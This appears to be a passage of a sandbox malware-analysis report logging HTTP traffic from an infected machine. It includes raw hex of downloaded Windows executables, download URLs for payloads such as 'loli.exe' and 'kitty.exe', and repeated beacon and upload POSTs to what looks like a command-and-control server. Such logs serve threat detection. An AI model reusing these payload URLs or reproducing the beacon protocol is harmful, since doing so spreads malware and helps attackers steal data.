2a 1a 72 89 05 00 70 2a 1a 20 f0 df bf 01 2a 1a 72 ed 05 00 70 2a 1a 20 53 08 dd 04 2a c2 28 2b 00 00 06 2d 07 28 2c 00 00 06 2c 02 2b 07 28 2d 00 00 06 2c 02 2b 07 28 2a 00 00 06 2c 02 2b 07 28 29 00 00 06 2c 06 14 28 5a 00 00 0a 2a 22 28 cb 00 00 06 2b 00 2a 22 28 04 01 00 06 2b 00 2a 26 28 39 01 00 06 26 2b 00 2a ee 2b 35 73 6b 00 00 0a 20 b8 0b 00 00 20 10 27 00 00 6f 6c 00 00 0a 28 2c 00 00 0a 7e 15 00 00 04 2d 0a 28 62 00 00 06 28 54 00 00 06 7e 1b 00 00 04 6f 6d 00 00 0a 26 17 2d c8 2a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:29 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 09 Aug 2024 00:59:07 GMTETag: "a5000-61f35a680ff51"Accept-Ranges: bytesContent-Length: 675840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 47 0a 00 00 20 00 00 00 48 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 05 00 00 00 80 0a 00 00 06 00 00 00 4a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 64 5b 0a 00 78 0c 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 df 23 47 89 01 64 0b df 50 c9 36 fe 3e f6 be 28 d6 1f 87 1e e6 3d 23 1e 14 55 2e d2 f4 52 69 0e fc 44 be c2 93 f2 08 00 94 0e 48 c1 78 9a 8e 37 d9 7a f8 29 56 16 3f 32 16 1b 74 f0 0a 73 91 ee ee e5 ab 41 2a 5d d0 8b c5 34 81 ec 72 49 30 20 50 82 f7 68 0e 73 dd 75 8b 01 e9 3b 50 ca a7 a4 a7 fb f5 ed 75 1d 8a c8 37 12 a3 9c ad 67 a3 fe 82 16 60 f2 bb 1f 1a 98 89 88 b4 b5 44 85 2e 61 ec 19 70 8f 14 f7 9c dc b3 f1 cf 6e 52 61 2b 35 d5 75 78 8c 2a 72 0d 07 0c cc 21 36 99 a7 ad 7d f5 cb 19 7b ad 8d c4 41 e1 36 f6 39 fb 14 2f 57 38 a9 87 27 d6 d3 a2 17 65 a2 cb d5 55 7c 89 78 2b 54 71 06 e4 92 e9 9f 37 2b 39 47 f8 74 9a b9 15 1c da 3d 94 bb 9f 4a 9f a4 c7 86 05 45 5b 17 13 5f 99 ac e0 89 af 4d 58 ad e1 ea 02 f3 21 40 39 1b bd 36 c0 5d ba b7 41 9a e1 c4 0a 09 74 7b bc 22 56 09 69 da f9 9f 25 b2 2e 2d d2 94 4c 64 24 8e 8b 07 eb 71 86 ed 8b ab 82 8f 08 2d db 9f 2a cd 78 19 62 d0 5e 7d 33 3a 63 5f de 44 d4 d3 96 6b 5e fd a4 99 a0 7e 19 34 38 41 dc 75 ed 52 f5 c6 64 63 ff 6c 80 99 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:31 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 09 Aug 2024 00:59:07 GMTETag: "a5000-61f35a680ff51"Accept-Ranges: bytesContent-Length: 675840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 47 0a 00 00 20 00 00 00 48 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 05 00 00 00 80 0a 00 00 06 00 00 00 4a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 64 5b 0a 00 78 0c 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 df 23 47 89 01 64 0b df 50 c9 36 fe 3e f6 be 28 d6 1f 87 1e e6 3d 23 1e 14 55 2e d2 f4 52 69 0e fc 44 be c2 93 f2 08 00 94 0e 48 c1 78 9a 8e 37 d9 7a f8 29 56 16 3f 32 16 1b 74 f0 0a 73 91 ee ee e5 ab 41 2a 5d d0 8b c5 34 81 ec 72 49 30 20 50 82 f7 68 0e 73 dd 75 8b 01 e9 3b 50 ca a7 a4 a7 fb f5 ed 75 1d 8a c8 37 12 a3 9c ad 67 a3 fe 82 16 60 f2 bb 1f 1a 98 89 88 b4 b5 44 85 2e 61 ec 19 70 8f 14 f7 9c dc b3 f1 cf 6e 52 61 2b 35 d5 75 78 8c 2a 72 0d 07 0c cc 21 36 99 a7 ad 7d f5 cb 19 7b ad 8d c4 41 e1 36 f6 39 fb 14 2f 57 38 a9 87 27 d6 d3 a2 17 65 a2 cb d5 55 7c 89 78 2b 54 71 06 e4 92 e9 9f 37 2b 39 47 f8 74 9a b9 15 1c da 3d 94 bb 9f 4a 9f a4 c7 86 05 45 5b 17 13 5f 99 ac e0 89 af 4d 58 ad e1 ea 02 f3 21 40 39 1b bd 36 c0 5d ba b7 41 9a e1 c4 0a 09 74 7b bc 22 56 09 69 da f9 9f 25 b2 2e 2d d2 94 4c 64 24 8e 8b 07 eb 71 86 ed 8b ab 82 8f 08 2d db 9f 2a cd 78 19 62 d0 5e 7d 33 3a 63 5f de 44 d4 d3 96 6b 5e fd a4 99 a0 7e 19 34 38 41 dc 75 ed 52 f5 c6 64 63 ff 6c 80 99 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:31 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 09 Aug 2024 00:59:07 GMTETag: "a5000-61f35a680ff51"Accept-Ranges: bytesContent-Length: 675840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 47 0a 00 00 20 00 00 00 48 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 05 00 00 00 80 0a 00 00 06 00 00 00 4a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 64 5b 0a 00 78 0c 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 df 23 47 89 01 64 0b df 50 c9 36 fe 3e f6 be 28 d6 1f 87 1e e6 3d 23 1e 14 55 2e d2 f4 52 69 0e fc 44 be c2 93 f2 08 00 94 0e 48 c1 78 9a 8e 37 d9 7a f8 29 56 16 3f 32 16 1b 74 f0 0a 73 91 ee ee e5 ab 41 2a 5d d0 8b c5 34 81 ec 72 49 30 20 50 82 f7 68 0e 73 dd 75 8b 01 e9 3b 50 ca a7 a4 a7 fb f5 ed 75 1d 8a c8 37 12 a3 9c ad 67 a3 fe 82 16 60 f2 bb 1f 1a 98 89 88 b4 b5 44 85 2e 61 ec 19 70 8f 14 f7 9c dc b3 f1 cf 6e 52 61 2b 35 d5 75 78 8c 2a 72 0d 07 0c cc 21 36 99 a7 ad 7d f5 cb 19 7b ad 8d c4 41 e1 36 f6 39 fb 14 2f 57 38 a9 87 27 d6 d3 a2 17 65 a2 cb d5 55 7c 89 78 2b 54 71 06 e4 92 e9 9f 37 2b 39 47 f8 74 9a b9 15 1c da 3d 94 bb 9f 4a 9f a4 c7 86 05 45 5b 17 13 5f 99 ac e0 89 af 4d 58 ad e1 ea 02 f3 21 40 39 1b bd 36 c0 5d ba b7 41 9a e1 c4 0a 09 74 7b bc 22 56 09 69 da f9 9f 25 b2 2e 2d d2 94 4c 64 24 8e 8b 07 eb 71 86 ed 8b ab 82 8f 08 2d db 9f 2a cd 78 19 62 d0 5e 7d 33 3a 63 5f de 44 d4 d3 96 6b 5e fd a4 99 a0 7e 19 34 38 41 dc 75 ed 52 f5 c6 64 63 ff 6c 80 99 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:34 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 09 Aug 2024 00:59:07 GMTETag: "a5000-61f35a680ff51"Accept-Ranges: bytesContent-Length: 675840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 47 0a 00 00 20 00 00 00 48 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 05 00 00 00 80 0a 00 00 06 00 00 00 4a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 64 5b 0a 00 78 0c 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 df 23 47 89 01 64 0b df 50 c9 36 fe 3e f6 be 28 d6 1f 87 1e e6 3d 23 1e 14 55 2e d2 f4 52 69 0e fc 44 be c2 93 f2 08 00 94 0e 48 c1 78 9a 8e 37 d9 7a f8 29 56 16 3f 32 16 1b 74 f0 0a 73 91 ee ee e5 ab 41 2a 5d d0 8b c5 34 81 ec 72 49 30 20 50 82 f7 68 0e 73 dd 75 8b 01 e9 3b 50 ca a7 a4 a7 fb f5 ed 75 1d 8a c8 37 12 a3 9c ad 67 a3 fe 82 16 60 f2 bb 1f 1a 98 89 88 b4 b5 44 85 2e 61 ec 19 70 8f 14 f7 9c dc b3 f1 cf 6e 52 61 2b 35 d5 75 78 8c 2a 72 0d 07 0c cc 21 36 99 a7 ad 7d f5 cb 19 7b ad 8d c4 41 e1 36 f6 39 fb 14 2f 57 38 a9 87 27 d6 d3 a2 17 65 a2 cb d5 55 7c 89 78 2b 54 71 06 e4 92 e9 9f 37 2b 39 47 f8 74 9a b9 15 1c da 3d 94 bb 9f 4a 9f a4 c7 86 05 45 5b 17 13 5f 99 ac e0 89 af 4d 58 ad e1 ea 02 f3 21 40 39 1b bd 36 c0 5d ba b7 41 9a e1 c4 0a 09 74 7b bc 22 56 09 69 da f9 9f 25 b2 2e 2d d2 94 4c 64 24 8e 8b 07 eb 71 86 ed 8b ab 82 8f 08 2d db 9f 2a cd 78 19 62 d0 5e 7d 33 3a 63 5f de 44 d4 d3 96 6b 5e fd a4 99 a0 7e 19 34 38 41 dc 75 ed 52 f5 c6 64 63 ff 6c 80 99 8

Source: global traffic	HTTP traffic detected: GET /52i.exe HTTP/1.1Host: 2x.si
Source: global traffic	HTTP traffic detected: GET /dl/12050075/loli.exe HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: GET /dl/12050266/googleupdats.exe HTTP/1.1Host: tmpfiles.orgCookie: XSRF-TOKEN=eyJpdiI6Ik5rOTRXbXJKQ3UxZm9tTk5GRnpGZmc9PSIsInZhbHVlIjoiUFI3Z0pORkEweFJqOXllNStmVlJOWWhBOUtHYkdBb3lXSFRncjNwdnB2NlZ3K3JTbVQ0TnJ4Z1RRK1lTcTBsUWlsQ3pnUUFFUnk1eE5ZM0t3ZnpHTE9FRDFzOVI0SUxYVzZoL1RHbE5peEQxSG1SQ0xvemZlUktzOEdqd2ViRmciLCJtYWMiOiI1ZjQzY2FhMWVjOWYyNGE3ZThlYjY4YjgxZmY0NjY5MTczY2U1MjQ0NDRhZWJjZjBmNzQ3N2JjZGJlNTkzZWJmIn0%3D; tmpfiles_session=eyJpdiI6IjgwM1pHV1MvT2N3Z2lLVFZZVWQ1NFE9PSIsInZhbHVlIjoiUE95bElQcGM0QmdYcUlGT3hGSGp0dThiL1AxWVc4SC82aFFnSnRieG0rTWpwN2VoZDA1bi9IMmJWT2pVZ2tiZ0kvcG9KWFk1Z2trUnR6NFdtd0ZpSE12RGZYZjdqQUNuMVNES09IMTUyOTZOcVZGNU56RklXbXRLZWFQN2tLZjgiLCJtYWMiOiI5ZWIyNzVmZTJjNjg3ODU1YzZjYTA3NjZiMDA2YjY3OWM1ZWQ1MDk1MTJlN2RlZTRkZTU0NDdhOTg2ZTU0OTg3In0%3D
Source: global traffic	HTTP traffic detected: GET /vGW.exe HTTP/1.1Host: 2x.siConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DamnCrypt/Zd8fux7fzhe2u7w/releases/download/Test/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/782711733/d424d098-b503-4902-b23f-cacb231ad890?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240831%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240831T204234Z&X-Amz-Expires=300&X-Amz-Signature=97c525f89adf13ec2bd6fb64e7fa3496235cc389517f40e7b5c36b7bd790d0c0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=782711733&response-content-disposition=attachment%3B%20filename%3Dplugin3.dll&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA0ODI4Host: 185.215.113.19Content-Length: 104980Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTg4NDk=Host: 185.215.113.19Content-Length: 99001Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000267001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwNzE0Host: 185.215.113.19Content-Length: 100866Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/kitty.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAzMjU1Host: 185.215.113.19Content-Length: 103407Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000268001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwNDg5Host: 185.215.113.19Content-Length: 100641Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 32 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000271001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAxMDUxHost: 185.215.113.19Content-Length: 101203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 32 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000272001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAyMTQ0Host: 185.215.113.19Content-Length: 102296Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/ovrflw.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTk5Host: 185.215.113.19Content-Length: 106151Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000277001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAxMzcyHost: 185.215.113.19Content-Length: 101524Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAxMzcyHost: 185.215.113.19Content-Length: 101524Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAyMjU2Host: 185.215.113.19Content-Length: 102408Cache-Control: no-cache
